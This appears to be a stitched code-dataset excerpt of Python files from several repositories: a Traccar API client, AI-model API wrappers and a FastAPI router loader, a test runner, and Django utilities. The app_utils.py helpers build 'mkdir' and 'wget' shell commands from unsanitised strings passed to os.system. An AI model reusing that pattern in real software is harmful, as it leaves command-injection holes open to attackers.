_LOGGER.error('Error connecting to Traccar, %s', error)
async def get_device_info(self):
"""Get the local installed version."""
await self.get_geofences()
await self.get_devices()
await self.get_positions()
devinfo = {}
try:
for dev in self._devices or []:
for pos in self._positions or []:
if pos['deviceId'] == dev.get('id'):
unique_id = dev.get('uniqueId')
devinfo[unique_id] = {}
devinfo[unique_id]['device_id'] = dev.get('id')
                        devinfo[unique_id]['device_name'] = dev.get('name')
devinfo[unique_id]['address'] = pos.get('address')
devinfo[unique_id]['updated'] = dev.get('lastUpdate')
devinfo[unique_id]['category'] = dev.get('category')
devinfo[unique_id]['latitude'] = pos.get('latitude')
devinfo[unique_id]['longitude'] = pos.get('longitude')
devinfo[unique_id]['altitude'] = pos.get('altitude')
devinfo[unique_id]['speed'] = pos.get('speed')
devattr = pos.get('attributes', {})
battery_level = devattr.get('batteryLevel')
motion = devattr.get('motion')
devinfo[unique_id]['battery'] = battery_level
devinfo[unique_id]['motion'] = motion
try:
geofence = self.geofences[dev['geofenceIds'][0]]
                        except (IndexError, KeyError):
geofence = None
devinfo[unique_id]['geofence'] = geofence
self._device_info = devinfo
_LOGGER.debug(self._device_info)
except KeyError as error:
_LOGGER.error('Error combining data from Traccar, %s', error)
async def get_geofences(self):
"""Get the local installed version."""
base_url = self._api + '/geofences'
try:
async with async_timeout.timeout(5, loop=self._loop):
response = await self._session.get(base_url,
auth=self._auth,
headers=HEADERS)
data = await response.json()
for geofence in data or []:
self._geofences[geofence['id']] = geofence['name']
_LOGGER.debug(self._geofences)
except (asyncio.TimeoutError,
aiohttp.ClientError, socket.gaierror) as error:
_LOGGER.error('Error fetching data from Traccar, %s', error)
async def get_devices(self):
"""Get the local installed version."""
base_url = self._api + '/devices'
try:
async with async_timeout.timeout(5, loop=self._loop):
response = await self._session.get(base_url,
auth=self._auth,
headers=HEADERS)
data = await response.json()
self._devices = data
_LOGGER.debug(self._devices)
except (asyncio.TimeoutError,
aiohttp.ClientError, socket.gaierror) as error:
_LOGGER.error('Error fetching data from Traccar, %s', error)
async def get_positions(self):
"""Get the local installed version."""
base_url = self._api + '/positions'
try:
async with async_timeout.timeout(5, loop=self._loop):
response = await self._session.get(base_url,
auth=self._auth,
headers=HEADERS)
data = await response.json()
self._positions = data
_LOGGER.debug(self._positions)
except (asyncio.TimeoutError,
aiohttp.ClientError, socket.gaierror) as error:
_LOGGER.error('Error fetching data from Traccar, %s', error)
@property
def geofences(self):
"""Return the configured geofences if any."""
return self._geofences
@property
def devices(self):
"""Return the devices if any."""
return self._devices
@property
def positions(self):
"""Return the device positions if any."""
return self._positions
@property
def device_info(self):
"""Return the device info if any."""
return self._device_info
@property
def authenticated(self):
"""Return bool that indicate the success of the authentication."""
return self._authenticated
``` |
{
"source": "jqueguiner/ai-api-marketplace-",
"score": 3
} |
#### File: ocrs/tesseract-denoising/tesseract-denoising.py
```python
import numpy as np
import cv2
import pytesseract
from PIL import Image
import re
def predict(image, source_language):
#image = cv2.imread(image)
    nparr = np.frombuffer(image, np.uint8)
img_np = cv2.imdecode(nparr, cv2.IMREAD_COLOR)
gray = cv2.cvtColor(img_np, cv2.COLOR_BGR2GRAY)
gray_thresh = cv2.medianBlur(gray, 3)
text = str(pytesseract.image_to_string(gray_thresh))
out = re.sub(r'[\x00-\x08\x0b\x0c\x0e-\x1f\x7f-\xff]', '', text)
return [out.strip()]
```
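For context, a minimal usage sketch of the OCR function above; the file name is illustrative, and note that this implementation accepts but ignores the `source_language` argument:
```python
# Hedged usage sketch for the predict() above; "sample.jpg" is an illustrative file name.
with open("sample.jpg", "rb") as f:
    image_bytes = f.read()

# source_language is accepted for API compatibility but not used by this implementation.
print(predict(image_bytes, source_language="eng"))
```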
#### File: autocorrects/flexudy-t5-base-multi-sentence-doctor/flexudy-t5-base-multi-sentence-doctor.py
```python
from transformers import AutoTokenizer, AutoModelWithLMHead
def predict(sentence):
tokenizer = AutoTokenizer.from_pretrained("flexudy/t5-base-multi-sentence-doctor")
model = AutoModelWithLMHead.from_pretrained("flexudy/t5-base-multi-sentence-doctor")
input_text = f"repair_sentence: {sentence}</s>"
input_ids = tokenizer.encode(input_text, return_tensors="pt")
outputs = model.generate(input_ids, max_length=32, num_beams=1)
sentence = tokenizer.decode(outputs[0], skip_special_tokens=True, clean_up_tokenization_spaces=True)
return sentence
```
#### File: hate-speech-detections/Hate-speech-CNERG-dehatebert-mono-english/Hate-speech-CNERG-dehatebert-mono-english.py
```python
from pydantic import BaseModel
import torch
from transformers import BertTokenizer, BertForSequenceClassification
def predict(text):
# load model
model = BertForSequenceClassification.from_pretrained('Hate-speech-CNERG/bert-base-uncased-hatexplain')
tokenizer = BertTokenizer.from_pretrained('Hate-speech-CNERG/bert-base-uncased-hatexplain')
# load model into gpu
device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')
model.to(device)
    inputs = tokenizer(text, return_tensors="pt").to(device)
    outputs = model(**inputs)
label = torch.argmax(torch.nn.functional.softmax(outputs.logits,dim=1))
if (label == 0):
label = "hate-speech"
elif (label == 2):
label = "offensive"
else:
label = "normal"
return label
```
#### File: language-detections/toftrup-etal-2021/toftrup-etal-2021.py
```python
from LanguageIdentifier import rank
import json
def predict(text):
output = list()
for k,v in rank(text):
output.append({'language': k, 'score': v})
return json.dumps(output)
```
#### File: lemmatizations/wordnet/wordnet.py
```python
import nltk
from nltk.stem import WordNetLemmatizer
def predict(sentence):
lemmatizer = WordNetLemmatizer()
word_list = nltk.word_tokenize(sentence)
lemmatized_output = [lemmatizer.lemmatize(w) for w in word_list]
return lemmatized_output
```
#### File: next-word-predictions/distilbert-base-uncased/distilbert-base-uncased.py
```python
from happytransformer import HappyWordPrediction
def predict(sentence):
happy_wp = HappyWordPrediction("DISTILBERT", "distilbert-base-uncased")
result = happy_wp.predict_mask(f"{sentence} [MASK]")
return result[0].token
```
#### File: sentence-paraphrasers/ramsrigouthamg-t5-large-paraphraser-diverse-high-quality/ramsrigouthamg-t5-large-paraphraser-diverse-high-quality.py
```python
from transformers import AutoTokenizer, AutoModelForSeq2SeqLM
import torch
def predict(context):
model = AutoModelForSeq2SeqLM.from_pretrained("ramsrigouthamg/t5-large-paraphraser-diverse-high-quality")
tokenizer = AutoTokenizer.from_pretrained("ramsrigouthamg/t5-large-paraphraser-diverse-high-quality")
device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
print ("device ",device)
model = model.to(device)
text = "paraphrase: "+ context + " </s>"
encoding = tokenizer.encode_plus(text, max_length =128, padding=True, return_tensors="pt")
input_ids,attention_mask = encoding["input_ids"].to(device), encoding["attention_mask"].to(device)
model.eval()
beam_outputs = model.generate(
input_ids=input_ids,attention_mask=attention_mask,
max_length=128,
early_stopping=True,
num_beams=15,
num_beam_groups = 5,
num_return_sequences=5,
diversity_penalty = 0.70
)
output = []
for beam_output in beam_outputs:
sent = tokenizer.decode(beam_output, skip_special_tokens=True,clean_up_tokenization_spaces=True)
output.append(sent.replace("paraphrasedoutput: ", ""))
return output
```
#### File: sentiment-analyses/distilbert-base-uncased/distilbert-base-uncased.py
```python
from happytransformer import HappyTextClassification
import json
def predict(text):
happy_tc = HappyTextClassification("DISTILBERT", "distilbert-base-uncased", num_labels=2)
result = happy_tc.classify_text(text)
#print(result) # TextClassificationResult(label='LABEL_0', score=0.9998761415481567)
return json.dumps({"label": "POSITIVE" if result.label == "LABEL_0" else "NEGATIVE", "score": result.score})
```
#### File: similarities/all-MiniLM-L6-v2/all-MiniLM-L6-v2.py
```python
from sentence_transformers import SentenceTransformer, util
import numpy as np
def predict(sentence_1, sentence_2):
model = SentenceTransformer('all-MiniLM-L6-v2')
embedding1 = model.encode(sentence_1, convert_to_tensor=True)
embedding2 = model.encode(sentence_2, convert_to_tensor=True)
cosine_scores = util.pytorch_cos_sim(embedding1, embedding2)
return str(cosine_scores.item())
```
#### File: word-alignments/bert-base-multilingual-cased/bert-base-multilingual-cased.py
```python
import transformers
import torch
import itertools
#https://colab.research.google.com/drive/1205ubqebM0OsZa1nRgbGJBtitgHqIVv6?usp=sharing#scrollTo=smW6s5JJflCN
def predict(input_string_language_1, input_string_language_2):
model = transformers.BertModel.from_pretrained('bert-base-multilingual-cased')
tokenizer = transformers.BertTokenizer.from_pretrained('bert-base-multilingual-cased')
sent_src, sent_tgt = input_string_language_1.strip().split(), input_string_language_2.strip().split()
token_src, token_tgt = [tokenizer.tokenize(word) for word in sent_src], [tokenizer.tokenize(word) for word in sent_tgt]
wid_src, wid_tgt = [tokenizer.convert_tokens_to_ids(x) for x in token_src], [tokenizer.convert_tokens_to_ids(x) for x in token_tgt]
    ids_src = tokenizer.prepare_for_model(list(itertools.chain(*wid_src)), return_tensors='pt',
                                          model_max_length=tokenizer.model_max_length, truncation=True)['input_ids']
    ids_tgt = tokenizer.prepare_for_model(list(itertools.chain(*wid_tgt)), return_tensors='pt',
                                          model_max_length=tokenizer.model_max_length, truncation=True)['input_ids']
sub2word_map_src = []
for i, word_list in enumerate(token_src):
sub2word_map_src += [i for x in word_list]
sub2word_map_tgt = []
for i, word_list in enumerate(token_tgt):
sub2word_map_tgt += [i for x in word_list]
# alignment
align_layer = 8
threshold = 1e-3
model.eval()
with torch.no_grad():
out_src = model(ids_src.unsqueeze(0), output_hidden_states=True)[2][align_layer][0, 1:-1]
out_tgt = model(ids_tgt.unsqueeze(0), output_hidden_states=True)[2][align_layer][0, 1:-1]
dot_prod = torch.matmul(out_src, out_tgt.transpose(-1, -2))
softmax_srctgt = torch.nn.Softmax(dim=-1)(dot_prod)
softmax_tgtsrc = torch.nn.Softmax(dim=-2)(dot_prod)
softmax_inter = (softmax_srctgt > threshold)*(softmax_tgtsrc > threshold)
align_subwords = torch.nonzero(softmax_inter, as_tuple=False)
align_words = set()
for i, j in align_subwords:
align_words.add( (sub2word_map_src[i], sub2word_map_tgt[j]) )
output = []
for i, j in sorted(align_words):
output.append({"source": sent_src[i], "target": sent_tgt[j]})
return output
```
#### File: ai-api-marketplace-/src/main.py
```python
import importlib
import json
import logging
import os
import pkgutil
from fastapi import Depends, FastAPI, HTTPException
from fastapi.encoders import jsonable_encoder
from fastapi.middleware.cors import CORSMiddleware
from fastapi.openapi.docs import get_swagger_ui_html
from fastapi.openapi.utils import get_openapi
from fastapi.security.oauth2 import (OAuth2, OAuthFlowsModel,
get_authorization_scheme_param)
from fastapi_utils.timing import add_timing_middleware, record_timing
from icecream import ic
from prometheus_fastapi_instrumentator import Instrumentator, metrics
from starlette.requests import Request
from starlette.responses import HTMLResponse, JSONResponse, RedirectResponse
import apis
import os
from fastapi.responses import ORJSONResponse
from pattern.text.en import singularize
config_file = os.getenv('API_CONFIG_FILE', 'config.json')
if os.path.isfile(config_file):
with open("config.json", "r") as f:
config = json.load(f)
try:
logging.basicConfig(level=logging.INFO, format=config["logs"]["log_format"])
except (KeyError, NameError):
logging.basicConfig(level=logging.INFO)
logger = logging.getLogger(__name__)
app = FastAPI(default_response_class=ORJSONResponse)
if config["prometheus"]["active"]:
instrumentator = Instrumentator(
should_group_status_codes=config["prometheus"]["instrumentator"][
"should_group_status_codes"
],
should_ignore_untemplated=config["prometheus"]["instrumentator"][
"should_ignore_untemplated"
],
should_group_untemplated=config["prometheus"]["instrumentator"][
"should_group_untemplated"
],
should_respect_env_var=config["prometheus"]["instrumentator"][
"should_respect_env_var"
],
env_var_name=config["prometheus"]["instrumentator"]["env_var_name"],
excluded_handlers=config["prometheus"]["instrumentator"]["excluded_handlers"],
should_round_latency_decimals=config["prometheus"]["instrumentator"][
"should_round_latency_decimals"
],
round_latency_decimals=config["prometheus"]["instrumentator"][
"round_latency_decimals"
],
should_instrument_requests_inprogress=config["prometheus"]["instrumentator"][
"should_instrument_requests_inprogress"
],
inprogress_name=config["prometheus"]["instrumentator"]["inprogress_name"],
inprogress_labels=config["prometheus"]["instrumentator"]["inprogress_labels"],
)
if config["logs"]["timing_activated"]:
add_timing_middleware(app, record=logger.info, prefix="app")
app.add_middleware(
CORSMiddleware,
allow_origins=config["CORS"]["allow_origins"],
allow_credentials=config["CORS"]["allow_credentials"],
allow_methods=config["CORS"]["allow_methods"],
allow_headers=config["CORS"]["allow_headers"],
)
def import_submodules(package, recursive=True):
global active_tasks
if isinstance(package, str):
current_package = package.split(".")
package = importlib.import_module(package)
for loader, name, is_pkg in pkgutil.walk_packages(package.__path__):
full_name = package.__name__ + "." + name
this_module = importlib.import_module(full_name)
module_short_name = full_name.replace("apis", "")[1:]
if "router" in dir(this_module):
module_input, module_output, module_task = module_short_name.split(".")
module_task = singularize(module_task).upper()
active_task_list = list(
map(
lambda each: singularize(each).upper(),
config["active_tasks"][module_input][module_output],
)
)
if "None".upper() not in active_task_list and (
"*" in config["active_tasks"][module_input][module_output]
or module_task in active_task_list
):
module_prefix = full_name.replace(".", "/").replace("apis", "")
ic(f"Loading module: {full_name}")
app.include_router(this_module.router, prefix=module_prefix)
if recursive and is_pkg:
ic(module_short_name)
module_split = module_short_name.split(".")
if len(module_split) == 1:
import_submodules(full_name)
elif (
len(module_split) == 2
and "None".upper
not in map(
lambda each: each.upper(),
config["active_tasks"][module_split[0]][module_split[1]],
)
or len(config["active_tasks"][module_split[0]][module_split[1]]) == 0
):
ic(f"importing {full_name}")
import_submodules(full_name)
elif len(module_split) == 3 and (
module_split[2].rstrip("s")
in map(
lambda each: each.rstrip("s"),
config["active_tasks"][module_split[0]][module_split[1]],
)
or "*" in config["active_tasks"][module_split[0]][module_split[1]]
):
ic(f"importing {full_name}")
import_submodules(full_name)
elif len(module_split) == 4:
ic(f"importing {full_name}")
import_submodules(full_name)
else:
ic(f"skipping {module_short_name}")
import_submodules(apis)
```
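For orientation, the router discovery above expects `config["active_tasks"]` to be nested by input type, then output type, with a list of task names per branch (`"*"` loads every task, `"none"` disables the branch). A hedged sketch of that shape, with made-up task names:
```python
# Illustrative shape of the "active_tasks" section read by import_submodules().
# Only the nesting (input -> output -> list of task names) is taken from the code above;
# the concrete task names below are invented for the example.
example_active_tasks = {
    "text": {
        "text": ["sentiment-analyses", "similarities"],  # load only these routers
        "image": ["none"],                               # disable this whole branch
    },
    "image": {
        "text": ["*"],                                   # wildcard: load every task
    },
}
```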
#### File: src/unit-test/test.py
```python
import easyargs
import json
import sys
import requests
from exitstatus import ExitStatus
global nb_total_tests
global nb_test_ran, nb_test_passed, nb_test_failed, nb_test_skipped
global test_final_status
global status_passed, status_failed, status_skipped
status_passed = "🟢"
status_skipped = "🟡"
status_failed = "🔴"
def get_nb_tests(url, header, endpoints, specific_endpoints):
nb_total_tests = 0
for path, details in endpoints['paths'].items():
if specific_endpoints:
if path in specific_endpoints:
nb_total_tests += get_nb_models(url, path, header)
else:
nb_total_tests += get_nb_models(url, path, header)
return nb_total_tests
def get_nb_models(url, path, header):
response = requests.get(f'{url}{path}', headers=header)
models = response.json()
return len(models)
def perform_test(details, url, header, path):
global nb_test_ran, nb_test_passed, nb_test_failed, nb_test_skipped
global test_final_status
global status_passed, status_failed, status_skipped
global nb_total_tests
tag = details['get']['tags'][0]
response = requests.get(f'{url}{path}', headers=header)
models = response.json()
for model in models:
input, output, task = details['post']['tags'][0].split('.')
status = ""
if input == 'image':
params = (
('model', model),
)
files = {
'image': ('test.jpg', open('test.jpg', 'rb')),
}
response = requests.post(f'{url}{path}', headers=header, params=params, files=files)
if response.status_code == 200:
nb_test_passed += 1
status = status_passed
else:
nb_test_failed += 1
status = status_failed
test_final_status = ExitStatus.failure
elif input == 'text':
params = [
('model', model),
]
for parameter in details['post']['parameters']:
if parameter['schema']['title'] != 'Model':
params.append((parameter['schema']['title'], parameter['schema']['default']))
params = tuple(params)
response = requests.post(f'{url}{path}', headers=header, params=params)
if response.status_code == 200:
status = status_passed
nb_test_passed += 1
else:
status = status_failed
nb_test_failed += 1
test_final_status = ExitStatus.failure
nb_test_ran += 1
progress = round((nb_test_ran / nb_total_tests)*100, 2)
print(f"| |__ {status} {model} ({progress}%) <{response.status_code}>")
print("|")
@easyargs
def main(url, bearer_token='', specific_endpoints=None):
if specific_endpoints:
specific_endpoints = specific_endpoints.split(',')
else:
specific_endpoints = []
header = {'Authorization': 'Bearer ' + bearer_token}
response = requests.get(f'{url}/openapi.json', headers=header)
endpoints = response.json()
print()
print(f"Testing endpoints")
print()
global nb_total_tests, nb_test_ran, nb_test_passed, nb_test_failed, nb_test_skipped
global test_final_status
nb_test_skipped = 0
nb_test_passed = 0
nb_test_failed = 0
nb_test_ran = 0
nb_total_tests = get_nb_tests(url, header, endpoints, specific_endpoints)
test_final_status = ExitStatus.success
for path, details in endpoints['paths'].items():
print(f"|__ {path}")
if specific_endpoints:
if path in specific_endpoints:
                perform_test(details, url, header, path)
else:
print(f"| |__ {status_skipped} <Skipped>")
print(f"|")
nb_test_skipped += 1
else:
            perform_test(details, url, header, path)
if test_final_status == ExitStatus.success:
str_final_status = "Success"
else:
str_final_status = "Failure"
print(f"""
Final status: {str_final_status}
Test Passed: {nb_test_passed}/{nb_total_tests} ({round((nb_test_passed / nb_total_tests)*100, 2)}%)
Test Failed: {nb_test_failed}/{nb_total_tests} ({round((nb_test_failed / nb_total_tests)*100, 2)}%)
Test Skipped: {nb_test_skipped}
""")
sys.exit(test_final_status)
if __name__ == '__main__':
main()
``` |
{
"source": "jqueguiner/ai-api-template",
"score": 3
} |
#### File: ai-api-template/src/app_utils.py
```python
import os
import requests
import random
import _thread as thread
from uuid import uuid4
import numpy as np
import skimage
from skimage.filters import gaussian
import zipfile
from PIL import Image
import matplotlib.image as mpimg
import cv2
def blur(image, x0, x1, y0, y1, sigma=1, multichannel=True):
y0, y1 = min(y0, y1), max(y0, y1)
x0, x1 = min(x0, x1), max(x0, x1)
im = image.copy()
sub_im = im[y0:y1,x0:x1].copy()
blur_sub_im = gaussian(sub_im, sigma=sigma, multichannel=multichannel)
blur_sub_im = np.round(255 * blur_sub_im)
im[y0:y1,x0:x1] = blur_sub_im
return im
def download(url, filename):
data = requests.get(url).content
with open(filename, 'wb') as handler:
handler.write(data)
return filename
def generate_random_filename(upload_directory, extension):
filename = str(uuid4())
filename = os.path.join(upload_directory, filename + "." + extension)
return filename
def clean_me(filename):
if os.path.exists(filename):
os.remove(filename)
def clean_all(files):
for me in files:
clean_me(me)
def create_directory(path):
os.system("mkdir -p %s" % os.path.dirname(path))
def get_model_bin(url, output_path):
if not os.path.exists(output_path):
create_directory(output_path)
cmd = "wget -O %s %s" % (output_path, url)
os.system(cmd)
return output_path
#model_list = [(url, output_path), (url, output_path)]
def get_multi_model_bin(model_list):
for m in model_list:
thread.start_new_thread(get_model_bin, m)
def unzip(path_to_zip_file, directory_to_extract_to='.'):
with zipfile.ZipFile(path_to_zip_file, 'r') as zip_ref:
zip_ref.extractall(directory_to_extract_to)
def resize_img_in_folder(path, w, h):
dirs = os.listdir(path)
for item in dirs:
if os.path.isfile(path+item):
im = Image.open(path+item)
f, e = os.path.splitext(path+item)
imResize = im.resize((w, h), Image.ANTIALIAS)
imResize.save(f + '.jpg', 'JPEG', quality=90)
def resize_img(path, w, h):
img = mpimg.imread(path)
img = cv2.resize(img, dsize=(w, h))
return img
``` |
{
"source": "jqueguiner/ai-django-core",
"score": 2
} |
#### File: admin/model_admins/inlines.py
```python
from django.contrib import admin
class ReadOnlyTabularInline(admin.TabularInline):
"""
    Base class to be extended by TabularInline classes.
    Disables all create, delete and edit functionality in the tabular inline admin.
"""
can_delete = False
def has_add_permission(self, *args, **kwargs):
return False
def has_change_permission(self, *args, **kwargs):
return False
def has_delete_permission(self, *args, **kwargs):
return False
def get_readonly_fields(self, request, obj=None):
result = list(set(
[field.name for field in self.opts.local_fields] +
[field.name for field in self.opts.local_many_to_many]
))
result.remove('id')
return result
```
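A hedged sketch of how such a read-only inline could be wired into a ModelAdmin, assuming the module lives at `ai_django_core.admin.model_admins.inlines` as the file path suggests; the `Invoice`/`InvoiceItem` models are purely illustrative:
```python
from django.contrib import admin

from ai_django_core.admin.model_admins.inlines import ReadOnlyTabularInline
from myapp.models import Invoice, InvoiceItem  # hypothetical models


class InvoiceItemInline(ReadOnlyTabularInline):
    model = InvoiceItem


@admin.register(Invoice)
class InvoiceAdmin(admin.ModelAdmin):
    # Items are displayed inline but cannot be added, changed or deleted.
    inlines = (InvoiceItemInline,)
```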
#### File: graphql/schemes/mutations.py
```python
import graphene
from django.utils.decorators import method_decorator
from graphql import GraphQLError
from graphql_jwt.decorators import login_required
class DeleteMutation(graphene.ClientIDMutation):
"""
Provides a mutation for handling common delete cases. Exposes methods for custom validation and queryset filtering.
"""
success = graphene.Boolean()
model = None
class Meta:
abstract = True
class Input:
id = graphene.ID()
@classmethod
def __init_subclass_with_meta__(cls, resolver=None, output=None, arguments=None, _meta=None, model=None, **options):
if not model:
raise AttributeError('DeleteMutation needs a valid model to be set.')
super().__init_subclass_with_meta__(resolver, output, arguments, _meta, **options)
cls.model = model
@classmethod
def validate(cls, request):
"""
Feel free to put any kind of custom validation rules here
"""
return True
@classmethod
def get_queryset(cls, request):
"""
Defines the queryset on which the object with the given ID can be chosen
"""
return cls.model.objects.all()
@classmethod
def mutate_and_get_payload(cls, root, info, **input_data):
"""
Ensure custom validation, fetch object and delete it afterwards.
"""
if not cls.validate(info.context):
raise GraphQLError('Delete method not allowed.')
# Get object id
object_id = int(input_data.get('id', None))
# Find and delete object
obj = cls.get_queryset(info.context).get(pk=object_id)
obj.delete()
# Return success
return DeleteMutation()
@method_decorator(login_required, name='mutate_and_get_payload')
class LoginRequiredDeleteMutation(DeleteMutation):
"""
Deletes an object from the database.
Ensures user is authenticated with GraphQL-JWT
"""
class Meta:
abstract = True
```
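A hedged sketch of wiring the login-protected variant for a concrete model; `Project`, its `owner` field and the mutation field name are illustrative:
```python
import graphene

from myapp.models import Project  # hypothetical model with an "owner" FK to the user


class DeleteProjectMutation(LoginRequiredDeleteMutation):
    class Meta:
        model = Project  # required; __init_subclass_with_meta__ raises without it

    @classmethod
    def get_queryset(cls, request):
        # Only allow deleting objects owned by the requesting user.
        return Project.objects.filter(owner=request.user)


class Mutation(graphene.ObjectType):
    delete_project = DeleteProjectMutation.Field()
```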
#### File: graphql/tests/base_test.py
```python
import json
from django.test import TestCase, Client
class GraphQLTestCase(TestCase):
"""
Provides a best-practice wrapper for easily testing GraphQL endpoints.
"""
# URL to graphql endpoint
GRAPHQL_URL = '/graphql/'
# Here you need to set your graphql schema for the tests
GRAPHQL_SCHEMA = None
@classmethod
def setUpClass(cls):
super(GraphQLTestCase, cls).setUpClass()
if not cls.GRAPHQL_SCHEMA:
raise AttributeError('Variable GRAPHQL_SCHEMA not defined in GraphQLTestCase.')
cls._client = Client(cls.GRAPHQL_SCHEMA)
def query(self, query: str, op_name: str = None, input_data: dict = None):
"""
:param query: GraphQL query to run
:param op_name: If the query is a mutation or named query, you must supply the op_name.
For annon queries ("{ ... }"), should be None (default).
:param input_data: If provided, the $input variable in GraphQL will be set to this value
:return: Response object from client
"""
body = {'query': query}
if op_name:
body['operation_name'] = op_name
if input_data:
body['variables'] = {'input': input_data}
resp = self._client.post(self.GRAPHQL_URL, json.dumps(body),
content_type='application/json')
return resp
def assertResponseNoErrors(self, resp):
"""
        Assert that the call went through correctly: a 200 status means the syntax is ok, and if there are
        no `errors`, the call was fine.
:resp HttpResponse: Response
"""
content = json.loads(resp.content)
self.assertEqual(resp.status_code, 200)
self.assertNotIn('errors', list(content.keys()))
def assertResponseHasErrors(self, resp):
"""
Assert that the call was failing. Take care: Even with errors, GraphQL returns status 200!
:resp HttpResponse: Response
"""
content = json.loads(resp.content)
self.assertIn('errors', list(content.keys()))
```
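A hedged example of a concrete test built on this wrapper; the schema import and the query fields are illustrative:
```python
from myproject.schema import schema  # hypothetical project schema


class ProjectQueryTest(GraphQLTestCase):
    GRAPHQL_SCHEMA = schema

    def test_all_projects_query_returns_no_errors(self):
        response = self.query(
            '''
            {
                allProjects {
                    id
                    name
                }
            }
            '''
        )
        self.assertResponseNoErrors(response)
```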
#### File: mail/backends/whitelist_smtp.py
```python
import re
from django.conf import settings
from django.core.mail.backends.smtp import EmailBackend as SMTPEmailBackend
class WhitelistEmailBackend(SMTPEmailBackend):
"""
Via the following settings it is possible to configure if mails are sent to all domains.
If not, you can configure a redirect to an inbox via CATCHALL.
EMAIL_BACKEND = 'ai_django_core.mail.backends.whitelist_smtp.WhitelistEmailBackend'
EMAIL_BACKEND_DOMAIN_WHITELIST = ['ambient.digital']
    EMAIL_BACKEND_REDIRECT_ADDRESS = '<EMAIL>'
If `EMAIL_BACKEND_REDIRECT_ADDRESS` is set, a mail to `<EMAIL>` will be redirected to
`<EMAIL>`
"""
@staticmethod
def get_domain_whitelist() -> list:
"""
Getter for configuration variable from the settings.
Will return a list of domains: ['ambient.digital', 'ambient.digital']
"""
return getattr(settings, 'EMAIL_BACKEND_DOMAIN_WHITELIST', [])
@staticmethod
def get_email_regex():
"""
Getter for configuration variable from the settings.
Will return a RegEX to match email whitelisted domains.
"""
        return r'^[\w\-\.]+@(%s)$' % '|'.join(WhitelistEmailBackend.get_domain_whitelist()).replace('.', r'\.')
@staticmethod
def get_backend_redirect_address() -> str:
"""
Getter for configuration variable from the settings.
Will return a string with a placeholder for redirecting non-whitelisted domains.
"""
return getattr(settings, 'EMAIL_BACKEND_REDIRECT_ADDRESS')
@staticmethod
def whitify_mail_addresses(mail_address_list: list) -> list:
"""
Check for every recipient in the list if its domain is included in the whitelist.
If not, and we have a redirect address configured, we change the original mail address to something new,
according to our configuration.
"""
allowed_recipients = []
for to in mail_address_list:
if re.search(WhitelistEmailBackend.get_email_regex(), to):
allowed_recipients.append(to)
elif WhitelistEmailBackend.get_backend_redirect_address():
# Send not allowed emails to the configured redirect address (with CATCHALL)
allowed_recipients.append(WhitelistEmailBackend.get_backend_redirect_address() % to.replace('@', '_'))
return allowed_recipients
def _process_recipients(self, email_messages):
"""
Helper method to wrap custom logic of this backend. Required to make it testable.
"""
for email in email_messages:
allowed_recipients = self.whitify_mail_addresses(email.to)
email.to = allowed_recipients
return email_messages
def send_messages(self, email_messages):
"""
Checks if email-recipients are in allowed domains and cancels if not.
Uses regular smtp-sending afterwards.
"""
email_messages = self._process_recipients(email_messages)
super().send_messages(email_messages)
```
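For illustration, a hedged settings sketch for this backend; the domain and the catch-all address are placeholders. The `%s` in the redirect address receives the original recipient with `@` replaced by `_`, as done in `whitify_mail_addresses`:
```python
# Illustrative Django settings for the whitelist backend (all values are placeholders).
EMAIL_BACKEND = 'ai_django_core.mail.backends.whitelist_smtp.WhitelistEmailBackend'
EMAIL_BACKEND_DOMAIN_WHITELIST = ['example.com']
# A mail to 'jane.doe@other.org' would be redirected to 'jane.doe_other.org@testing.example.com'.
EMAIL_BACKEND_REDIRECT_ADDRESS = '%s@testing.example.com'
```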
#### File: ai-django-core/ai_django_core/managers.py
```python
from django.db.models import QuerySet, Manager
class AbstractPermissionMixin:
"""
Mixin that provides an interface for a basic per-object permission system.
Single objects cannot be checked individually, but can be matched with the corresponding query set.
Please append further methods here, if necessary, in order to make them accessible at all inheriting classes
(query sets AND managers).
"""
def visible_for(self, user):
raise NotImplementedError('Please implement this method')
def editable_for(self, user):
raise NotImplementedError('Please implement this method')
def deletable_for(self, user):
raise NotImplementedError('Please implement this method')
class AbstractUserSpecificQuerySet(QuerySet, AbstractPermissionMixin):
""""
Extend this queryset in your model if you want to implement a visible_for functionality.
"""
def default(self, user):
return self
def visible_for(self, user):
raise NotImplementedError('Please implement this method')
def editable_for(self, user):
raise NotImplementedError('Please implement this method')
def deletable_for(self, user):
raise NotImplementedError('Please implement this method')
class AbstractUserSpecificManager(Manager, AbstractPermissionMixin):
"""
    The UserSpecificQuerySet has a method 'as_manager', which can be used to create a default manager
    that inherits all methods of the queryset and delegates to the respective queryset method.
    If the manager has to be declared separately for some reason, all queryset methods have to be declared twice:
    once in the QuerySet and once in the manager class.
    For consistency reasons, both inherit from the same mixin to ensure the method names stay equal.
"""
def visible_for(self, user):
return self.get_queryset().visible_for(user)
def editable_for(self, user):
return self.get_queryset().editable_for(user)
def deletable_for(self, user):
return self.get_queryset().deletable_for(user)
class GloballyVisibleQuerySet(AbstractUserSpecificQuerySet):
"""
Manager (QuerySet) for classes which do NOT have any visibility restrictions.
"""
def visible_for(self, user):
return self.all()
def editable_for(self, user):
return self.visible_for(user)
def deletable_for(self, user):
return self.visible_for(user)
```
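A hedged sketch of a model plugging into these querysets; the `Project` model and its `owner` field are illustrative:
```python
from django.conf import settings
from django.db import models


class ProjectQuerySet(AbstractUserSpecificQuerySet):
    # Hypothetical per-object permissions based on an "owner" field.
    def visible_for(self, user):
        return self.filter(owner=user)

    def editable_for(self, user):
        return self.visible_for(user)

    def deletable_for(self, user):
        return self.visible_for(user)


class Project(models.Model):
    owner = models.ForeignKey(settings.AUTH_USER_MODEL, on_delete=models.CASCADE)

    # as_manager() exposes visible_for()/editable_for()/deletable_for() on the default manager.
    objects = ProjectQuerySet.as_manager()
```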
#### File: ai_django_core/templatetags/ai_date_tags.py
```python
from django import template
register = template.Library()
@register.filter
def format_to_minutes(time):
"""
Converts the seconds to minutes
:param time:
:return minutes:
"""
return time.seconds // 60
```
#### File: ai_django_core/templatetags/ai_file_tags.py
```python
import os
from django import template
from django.conf import settings
register = template.Library()
@register.filter
def filename(value, max_length=25):
"""
    Shortens the filename to at most max_length characters without losing the file extension
    :param value:
    :param max_length:
    :return: filename with a maximum length of max_length
"""
name = os.path.basename(value.url)
if len(name) > max_length:
ext = name.split('.')[-1]
name = "%s[..].%s" % (name[:max_length], ext)
return name
@register.filter
def filesize(value):
"""
Returns the filesize of the filename given in value
:param value:
:return filesize:
"""
try:
return os.path.getsize("%s%s" % (settings.MEDIA_ROOT, value))
except Exception:
return 0
```
